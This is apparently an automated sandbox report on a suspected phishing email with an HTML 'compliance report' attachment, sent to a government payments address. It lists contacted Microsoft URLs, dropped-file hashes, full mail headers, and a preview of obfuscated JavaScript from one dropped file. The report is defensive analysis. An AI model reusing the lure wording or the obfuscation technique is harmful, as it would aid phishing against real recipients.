https://portal.office.com/account/?ref=ClientMeControl | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://clients.config.office.net/c2r/v1.0/DeltaAdvisory | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://edge.skype.com/registrar/prod | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://graph.ppe.windows.net | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://res.getmicrosoftkey.com/api/redemptionevents | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://powerlift-frontdesk.acompli.net | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://tasks.office.com | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://officeci.azurewebsites.net/api/ | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://api.scheduler. | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://my.microsoftpersonalcontent.com | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | | unknown
https://store.office.cn/addinstemplate | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://api.aadrm.com | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://edge.skype.com/rps | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid= | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | | unknown
https://globaldisco.crm.dynamics.com | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://messaging.engagement.office.com/ | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://dev0-api.acompli.net/autodetect | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://www.odwebp.svc.ms | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://api.diagnosticssdf.office.com/v2/feedback | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://api.powerbi.com/v1.0/myorg/groups | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://web.microsoftstream.com/video/ | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://api.addins.store.officeppe.com/addinstemplate | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://graph.windows.net | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://dataservice.o365filtering.com/ | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://officesetup.getmicrosoftkey.com | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://analysis.windows.net/powerbi/api | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://prod-global-autodetect.acompli.net/autodetect | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://substrate.office.com | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://outlook.office365.com/autodiscover/autodiscover.json | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://consent.config.office.com/consentcheckin/v1.0/consents | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://d.docs.live.net | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | | unknown
https://safelinks.protection.outlook.com/api/GetPolicy | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://ncus.contentsync. | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | | unknown
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
http://weather.service.msn.com/data.aspx | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://apis.live.net/v5.0/ | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
https://officepyservice.office.net/service.functionality | E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.dr | false | URL Reputation: safe | unknown
    https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    unknown
    https://templatesmetadata.office.net/E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    unknown
    https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    unknown
    https://messaging.lifecycle.office.com/E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    unknown
    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    unknown
    https://mss.office.comE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    unknown
    https://pushchannel.1drv.msE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    unknown
    https://management.azure.comE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    unknown
    https://outlook.office365.comE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    unknown
    https://wus2.contentsync.E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    unknown
    https://incidents.diagnostics.office.comE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    unknown
    https://clients.config.office.net/user/v1.0/iosE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    unknown
    https://make.powerautomate.comE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    unknown
    https://api.addins.omex.office.net/api/addins/searchE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    unknown
    https://insertmedia.bing.office.net/odc/insertmediaE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    unknown
    https://outlook.office365.com/api/v1.0/me/ActivitiesE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    unknown
    https://api.office.netE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    unknown
    https://incidents.diagnosticssdf.office.comE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    unknown
    https://asgsmsproxyapi.azurewebsites.net/E1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    unknown
    https://clients.config.office.net/user/v1.0/android/policiesE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    unknown
    https://entitlement.diagnostics.office.comE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    unknown
    https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonE1A01489-A13D-42EC-BB87-94C7B41EE11D.0.drfalse
    • URL Reputation: safe
    unknown
    No contacted IP infos
    Joe Sandbox version:41.0.0 Charoite
    Analysis ID:1532881
    Start date and time:2024-10-14 04:34:44 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 5m 4s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:6
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:9ba54f65-7bc2-d549-b688-53131649ef52.eml
    Detection:CLEAN
    Classification:clean1.winEML@3/11@0/0
    Cookbook Comments:
    • Found application associated with file extension: .eml
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
    • Excluded IPs from analysis (whitelisted): 52.109.28.46, 52.113.194.132, 104.208.16.92
    • Excluded domains from analysis (whitelisted): ecs.office.com, slscr.update.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, s-0005-office.config.skype.com, mobile.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, ecs-office.s-0005.s-msedge.net, onedscolprdcus23.centralus.cloudapp.azure.com, s-0005.s-msedge.net, config.officeapps.live.com, officeclient.microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net, mobile.events.data.trafficmanager.net, uks-azsc-config.officeapps.live.com
    • Not all processes were analyzed; the report is missing behavior information
    • Report size getting too big, too many NtQueryAttributesFile calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    No simulations
    No context
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
    File Type:data
    Category:dropped
    Size (bytes):231348
    Entropy (8bit):4.381234503527055
    Encrypted:false
    SSDEEP:3072:bSg5xCgWmiGu2/qoQLrt0FvAwJ0iaDp/rL7:bdYmi2S2J0iaDp/rv
    MD5:407B35897A6FF31560D23A21921F4B74
    SHA1:70B3F6FA2BE0CDE84E73DA537884F54137D87815
    SHA-256:5A856661755D63D6CAC9B1C668A312B009350DD31FA2E9BE5AA31C72B541ABFD
    SHA-512:66310EC1D7A4B3EA999520BDD49C091CFF5D684AD5D2F6B70431CB387EF10135029284B8D37DFD89D5B9AA2126CC9E5E9C8085F15C16173500DCDBFCF118C52F
    Malicious:false
    Reputation:low
    Preview:TH02...... ............SM01X...,...................IPM.Activity...........h...............h............H..hl........ H....h........ ...H..h\jon ...ppDa...h.[..0.........h.'.............h........_`.j...h.$..@...I..v...h....H...8..j...0....T...............d.........2h...............k.............!h.............. h~.]..........#h....8.........$h .......8....."h.w.......x....'h..............1h.'..<.........0h....4.....j../h....h......jH..h....p...l.....-h .............+h;&......`................... ..............F7..............FIPM.Activity.st.Form.e..Standard.tanJournal Entry.pdIPM.Microsoft.FolderDesign.FormsDescription................F.k..........1122110020000000.000Microsoft.ofThis form is used to create journal entries.........kf...... ..........&...........(.......(... ...@.....................................................................................................................fffffffff........wwwwwwww.p....pp..............p...............pw..............pw..DDDDO..
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):178099
    Entropy (8bit):5.2905134907652105
    Encrypted:false
    SSDEEP:1536:ri2XfRAqcbH41gwEwLe7HW8bM/o/NMdcAZl1p5ihs7EXXDEAD2Odago:+Ce7HW8bM/o/TXgk9o
    MD5:246B9AA3DDD00FAC4726A961176AA250
    SHA1:957791B90BA68126E5139CE6EA2DD64E03749FE2
    SHA-256:2A488A16771DDCBFAE2C3FF1CEF97253411EB1D21F6765FFD2DCA6794C4C15C8
    SHA-512:9DFC40CA362B11F18023F7A69366DE822612C9FE0669B2569CEC22589D268F1518B075E50D8BD98F943603BA5F659D8252E2DB9F313CB2C8832FAE063131A488
    Malicious:false
    Reputation:low
    Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2024-10-14T02:36:04">.. Build: 16.0.18204.40137-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://word-edit.officeapps.live.com/we/rrdiscovery.ashx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
    File Type:data
    Category:dropped
    Size (bytes):32768
    Entropy (8bit):0.04587332210802959
    Encrypted:false
    SSDEEP:3:GtlxtjlDF+ztZfylxtjlDF+ztZf1jR9//8l1lvlll1lllwlvlllglbelDbllAlla:Gt5why5whH9X01PH4l942wU
    MD5:A3A557B88990E64F99D7C3F19686911B
    SHA1:A9FB0BC02369AC92F8CC3A0097E43F66812379AC
    SHA-256:F9DC4FB42F38BBF03018A36EF1315DC952F9A636BF3FB4F7DF634FC2FCA240A8
    SHA-512:02844C4C3CD7470198207A6092B08C90255397F1543903133E7E7E8723AFB3E2A431BE54FC273AE5E1982EB56C5F899F95B1ACDFB03C32CCF62E43202E86AB7B
    Malicious:false
    Reputation:low
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
    File Type:SQLite Write-Ahead Log, version 3007000
    Category:modified
    Size (bytes):49472
    Entropy (8bit):0.48450738053454545
    Encrypted:false
    SSDEEP:48:/IQ1ZUll7DYMltM0XzO8VFDYM4G2cBO8VFDYML:DUll42tdjVGMjVGC
    MD5:D2EA30853ECC378C4D43BE726AFE1754
    SHA1:3172CF49A81AF8D872D438CEDBFDC5100342C3AD
    SHA-256:5B6A29CEB8B571D2E392EDE5809EAE5481AE344FA8EB5B431D93B28B9EC1AAF0
    SHA-512:5BB85C21CCECF9365C8B8F0CA913BCD7A2FA8A8A4EEF032EF3E35D8D7FDADF744775D3EE7309D040B5073ADC5B942E74F108C1D55916C8FAF878B1CF27CDAF35
    Malicious:false
    Reputation:low
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
    File Type:ASCII text, with very long lines (28775), with CRLF line terminators
    Category:dropped
    Size (bytes):20971520
    Entropy (8bit):0.1609058207313405
    Encrypted:false
    SSDEEP:1536:bvivvq1HTDSpg2ygM0bQLACQul2nvsU3cej82lbv8VPncBI:Oq9qpgibuki
    MD5:160F84DEDC4F97251A490B4D23E370D7
    SHA1:4FD243F7FE83FB415F70BAB042BCBE6CA963BF85
    SHA-256:41682D97810F11FBDBB1DA650750EDD6972067E53A954A034BE3CFE0DFA8D737
    SHA-512:E669E98262934523050F224B4A8BE1FCAF2D7AB98F3E87377D6E6C4B6C87CF1384DDE4C4EE697B80EA37AEDC3CE92F08AE7B97980C5613F482325C97984D7F93
    Malicious:false
    Reputation:low
    Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..10/14/2024 02:36:01.460.OUTLOOK (0x1E98).0x1E9C.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.GDIAssistant.HandleCallback","Flags":30962256044949761,"InternalSequenceNumber":22,"Time":"2024-10-14T02:36:01.460Z","Contract":"Office.System.Activity","Activity.CV":"rheHNBYj4Uig6Lde4nq5/w.4.9","Activity.Duration":15,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.GdiFamilyName":"","Data.CloudFontStatus":6,"Data.CloudFontTypes":256}...10/14/2024 02:36:01.585.OUTLOOK (0x1E98).0x1E9C.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.ResourceClient.Deserialize","Flags":30962256044949761,"InternalSequenceNumber":24,"Time":"2024-10-14T02:36:01.585Z","Contract":"Office.System.Activity","Activity.CV":"rheHNBYj4Uig6Lde4nq5/w.4.10","Activity.Duration":85914,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.JsonFileMajorV
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
    File Type:data
    Category:dropped
    Size (bytes):20971520
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:3::
    MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
    SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
    SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
    SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
    Malicious:false
    Reputation:high, very likely benign file
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
    File Type:data
    Category:dropped
    Size (bytes):110592
    Entropy (8bit):4.5185413302722095
    Encrypted:false
    SSDEEP:768:cLqjbkxd5uVf+34Asc4GE9Hu4TS6yZXESWcWRhXJVlWiWqkoCUc:ucw4GE9Hu4TS6SXNjUc
    MD5:9317CD50DFFC71A07138C623BBDCD8BF
    SHA1:30A642E5ACAA19EB3BD52D41D734F231B4DB5943
    SHA-256:102FC507CD482100D9142CF86AEA932B90D72263A1AC9F756D03B1EBB1867E66
    SHA-512:EEF45833C65A3000BCE243737B4A03ACD613CE41956690DB4C42A02879103C3B468F0F38B543DF96FBA492B437B78D88C508DA25A9CADC383BF8AFAF0C7ABBDA
    Malicious:false
    Reputation:low
    Preview:............................................................................b.............f.....................eJ..............Zb..2...................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................P.'...............f.............v.2._.O.U.T.L.O.O.K.:.1.e.9.8.:.2.5.d.0.1.c.5.4.7.4.0.0.4.f.f.1.8.0.f.a.2.4.7.e.f.d.a.c.9.b.9.d...C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.4.1.0.1.3.T.2.2.3.6.0.0.0.5.2.3.-.7.8.3.2...e.t.l.............P.P...........f.....................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
    File Type:ASCII text, with very long lines (65536), with no line terminators
    Category:dropped
    Size (bytes):246692
    Entropy (8bit):3.82721026417753
    Encrypted:false
    SSDEEP:3072:wfe98RF9aMoZqVOOA9hyjsOv4rzJh/MDBRSAVu3UZEGyLgtxJclL2MBUHSk+E9AD:L
    MD5:592CA644FD0F80879EA360BF30720ED0
    SHA1:E5DB13CE3D2D69C872ADB96352B9BF1329C053CC
    SHA-256:4CB098FAF9EF4C7A9CC96072D114BD19F40B8729BD0F70E5D90D12D149D2CDAD
    SHA-512:B8A50395CA3C8C7D6736ADF727A0EED6497C29FAAD5026A82AE7E9CC41237FD2F85F47158C77C7B7D0FADEC6B20CEADA08D6ACE4CEE31FA3981A62EA1D4C8979
    Malicious:false
    Reputation:low
    Preview:$+lp+(25)[p](30)+c+'('+'"'+'%'+'5'+'9'+'"'+')')()+'2'+'8'+(([]+[])[l]+[])[14]+lp+[][u][l](_+c+y+k+_+lc+' '+k+lc+c+pu+$+lp+(25)[p](30)+c+'('+'"'+'%'+'4'+'7'+'"'+')')()+[][u][l](_+c+y+k+_+lc+' '+k+lc+c+pu+$+lp+(25)[p](30)+c+'('+'"'+'%'+'4'+'6'+'"'+')')()+y+lk+[][u][l](_+c+y+k+_+lc+' '+k+lc+c+pu+$+lp+(25)[p](30)+c+'('+'"'+'%'+'4'+'7'+'"'+')')()+py+(25)[p](30)+pl+[][u][l](_+c+y+k+_+lc+' '+k+lc+c+pu+$+lp+(25)[p](30)+c+'('+'"'+'%'+'4'+'7'+'"'+')')()+(33)[p](34)+'1'+pl+(([]+[])[l]+[])[9]+((![])[l]+[])[9]+'0'+[][u][l](_+c+y+k+_+lc+' '+k+lc+c+pu+$+lp+(25)[p](30)+c+'('+'"'+'%'+'4'+$+'"'+')')()+[][u][l](_+c+y+k+_+lc+' '+k+lc+c+pu+$+lp+(25)[p](30)+c+'('+'"'+'%'+'5'+'7'+'"'+')')()+[][u][l](_+c+y+k+_+lc+' '+k+lc+c+pu+$+lp+(25)[p](30)+c+'('+'"'+'%'+'4'+lp+'"'+')')()+([][u]+[])[23]+pl+((0)[l]+[])[11]+[][u][l](_+c+y+k+_+lc+' '+k+lc+c+pu+$+lp+(25)[p](30)+c+'('+'"'+'%'+'5'+'5'+'"'+')')()+(([]+[])[l]+[])[14]+$+'2'+pk+lu+pl+[][u][l](_+c+y+k+_+lc+' '+k+lc+c+pu+$+lp+(25)[p](30)+c+'('+'"'+'%'+'4'+'7'+'"'+')')
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
    File Type:data
    Category:dropped
    Size (bytes):30
    Entropy (8bit):1.2389205950315936
    Encrypted:false
    SSDEEP:3:Y4l7/lt:Y4l7/
    MD5:C57B32652ACD997DF9CB7901A66E6EDC
    SHA1:0278FA5F147F6C3B8FEFA17C629D4CB92B54B89D
    SHA-256:A95F6F5D90048E13C12035D530C3776D76C96F09ED6A4584107EA861C6119AB1
    SHA-512:A86F5040CDADA3BCF0FFB453324A88643CF5640FDC629244A9C250F4A761A44FFBE067260C5E28F39BD217F3DA927D7F68D8361D1A5C53BD6EFA4D32D61242D3
    Malicious:false
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
    File Type:Microsoft Outlook email folder (>=2003)
    Category:dropped
    Size (bytes):525312
    Entropy (8bit):4.451016618444054
    Encrypted:false
    SSDEEP:1536:wbm94tI79HlJ0P3YBAcZRL7tCQ1DQDgj/pW53jEpEHP4qQ10PAwr1:wbWCAfljLp9
    MD5:1CDB5921D28ED5576582000EA42AF70E
    SHA1:2C64A8F4BA7A2FC77AB04FC7D621619910E70830
    SHA-256:C760789BC863699793785C1D9625E6D8D356264502C72D67E57DDD2CEEA01DCE
    SHA-512:07A1AE0E2A56710684794E8D297604732E2E05BCA44952872467C86A09B6C9A1CB05BBE4DB367F526C1389EFF8D137487CFC6A3FEDA02B2AB91ACA15803661BA
    Malicious:false
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
    File Type:data
    Category:dropped
    Size (bytes):524288
    Entropy (8bit):4.420403967310337
    Encrypted:false
    SSDEEP:1536:f3jEpEHP4qQ10PAwr1E/dtilHlJ0P3YBA3ZRLWuBOzS0hc+:4p9HX4hc
    MD5:F23EAE9A04398EC0CDB29767E35BAC90
    SHA1:95B7CD9C45E7D32B98D07EBAAFFF44F16080764B
    SHA-256:73054CD7898AC01164E64F3972C76C7956B01B1AD1253D192FB1766BC8CB274A
    SHA-512:581346C50C119A023EB18B157BAC43C90D0A268F9C406357B0F0FE711F6096FCE85712A11E5149F08F87E4F650839A6495B2CB7134E658A1DA6476E4B5A4A4A2
    Malicious:false
    File type:RFC 822 mail, ASCII text, with CRLF line terminators
    Entropy (8bit):5.170060543608475
    TrID:
    • E-Mail message (Var. 5) (54515/1) 100.00%
    File name:9ba54f65-7bc2-d549-b688-53131649ef52.eml
    File size:525'374 bytes
    MD5:60624e033806c4f3cbaf007f40a20567
    SHA1:30b3376aadd75ae410e80dd634bb0b94c18f9475
    SHA256:e923f8572bcc23f76e60ea7200c48ae370c9648cb79c5bf96fc715f6bd43341a
    SHA512:db7657745057ddfd7652221a78cff32e935d4d33fdca443a60c62406c299da7a9b3d1d6e18902197a3b6cfc16b8f14faf31f137dd99288a6bda307feb0396ca2
    SSDEEP:768:KwShfkz/fTnJY37dYMT+CgbVFHsvtfG+5TOM4oP4arBys1NLJCecDs8sz/K14etl:KijfTnJYLI+tPUDj1cqF7
    TLSH:4CB4EA20833D913EA0964D6909F688EF9BEE55F62BF7A0D01CC25FEB4483229C5E55F1
    File Content Preview:Received: from SY5PR01CA0051.ausprd01.prod.outlook.com (2603:10c6:10:1fc::11).. by SYBPR01MB6126.ausprd01.prod.outlook.com (2603:10c6:10:9d::13) with.. Microsoft SMTP Server (version=TLS1_2,.. cipher=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) id 15.20.8048.18
    Subject:Complete and Submit Q3 Workplace Compliance Report by 10/9/2024 | ID-4546.NLKBZ:8c3f5541a91374b5bf18ac88017a597742a1891a
    From:WorkplaceHQ <angelika.klingler@kabelrinn.at>
    To:paymentservices@icare.nsw.gov.au
    Cc:
    BCC:
    Date:Wed, 09 Oct 2024 14:10:30 +0000
    Communications:
      Attachments:
        Key Value
        Received: from [127.0.0.1] (unknown [192.71.166.200]) by mail.kabelrinn.at (Postfix) with ESMTPSA id 52C363B6F9D for <paymentservices@icare.nsw.gov.au>; Wed, 9 Oct 2024 16:10:31 +0200 (CEST)
        Authentication-Results: spf=pass (sender IP is 185.98.68.35) smtp.mailfrom=kabelrinn.at; dkim=pass (signature was verified) header.d=kabelrinn.at;dmarc=pass action=none header.from=kabelrinn.at;compauth=pass reason=100
        Received-SPF: Pass (protection.outlook.com: domain of kabelrinn.at designates 185.98.68.35 as permitted sender) receiver=protection.outlook.com; client-ip=185.98.68.35; helo=as1.kabelrinn.at; pr=C
        DKIM-Filter: OpenDKIM Filter v2.10.3 mail.kabelrinn.at 84AEF3B6D33
        DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=kabelrinn.at; s=A696B41A-4E3C-11EF-99D0-B28A843D9D7D; t=1728484423; bh=fLr0Z0p4EBZ6yJmWyr5nnZiwg7hZWF1ywZa/7SooN1U=; h=From:To:Message-ID:Date:MIME-Version; b=ZvYafZU3ZIsdR93jLVDezaLzkaJkCQNRvGCMp+RCvuDmArlWdO3cJ20hNTegCijuw ILvf6CK9D4B7ixTAHksga1SZ5ypJkIHDdPeomB/KzkCpElYhnoI3Nds2qkbGsem5xt PoDJd/W7jexNcE5QIt2VV+7IUCSRbDrwUu3ge5NQLjwrNZdqNhluvgulc7cTof3r4V toGWD8NKsw7fWQAUT4YKsqGsKegthpmKG0Rro3RvWBz6fkV0gsGaX3u4WVcHzt7ZAe begdktk9Lj/LcBLy5TQFT9ktif9BBMU1Jd3gi9/Vt2WN9a8OidF710u9m9ey2n7v9A 94JWjY4rXK7gQ==
        X-Virus-Scanned: amavis at mail.kabelrinn.at
        Content-Type: text; name="Compliance_Report_Final_Q3_8c3f5541a91374b5bf18ac88017a597742a1891a.html"
        Content-Transfer-Encoding: base64
        Content-Disposition: attachment; filename="Compliance_Report_Final_Q3_8c3f5541a91374b5bf18ac88017a597742a1891a.html"
        From: WorkplaceHQ <angelika.klingler@kabelrinn.at>
        To: paymentservices@icare.nsw.gov.au
        Subject: Complete and Submit Q3 Workplace Compliance Report by 10/9/2024 | ID-4546.NLKBZ:8c3f5541a91374b5bf18ac88017a597742a1891a
        Message-ID: <7baad9be-6976-db43-6272-98725490a5c2@kabelrinn.at>
        Date: Wed, 09 Oct 2024 14:10:30 +0000
        MIME-Version: 1.0
        Return-Path: angelika.klingler@kabelrinn.at
        X-EOPAttributedMessage: 0
        X-EOPTenantAttributedMessage: 34ae0514-4eb5-4608-8b64-b002d2054238:0
        X-MS-PublicTrafficType: Email
        X-MS-TrafficTypeDiagnostic: SY1PEPF00005A3C:EE_|SYBPR01MB6126:EE_
        X-MS-Office365-Filtering-Correlation-Id: 4beb35c9-4d84-488f-80ff-08dcea6609a6
        X-MS-Exchange-AtpMessageProperties: SA|SL
        X-Forefront-Antispam-Report: CIP:185.98.68.35;CTRY:AT;LANG:en;SCL:9;SRV:;IPV:NLI;SFV:SPM;H:as1.kabelrinn.at;PTR:as.kabelrinn.at;CAT:AMP;SFS:(13230040)(12012899012)(2613699012)(43540500003);DIR:INB;
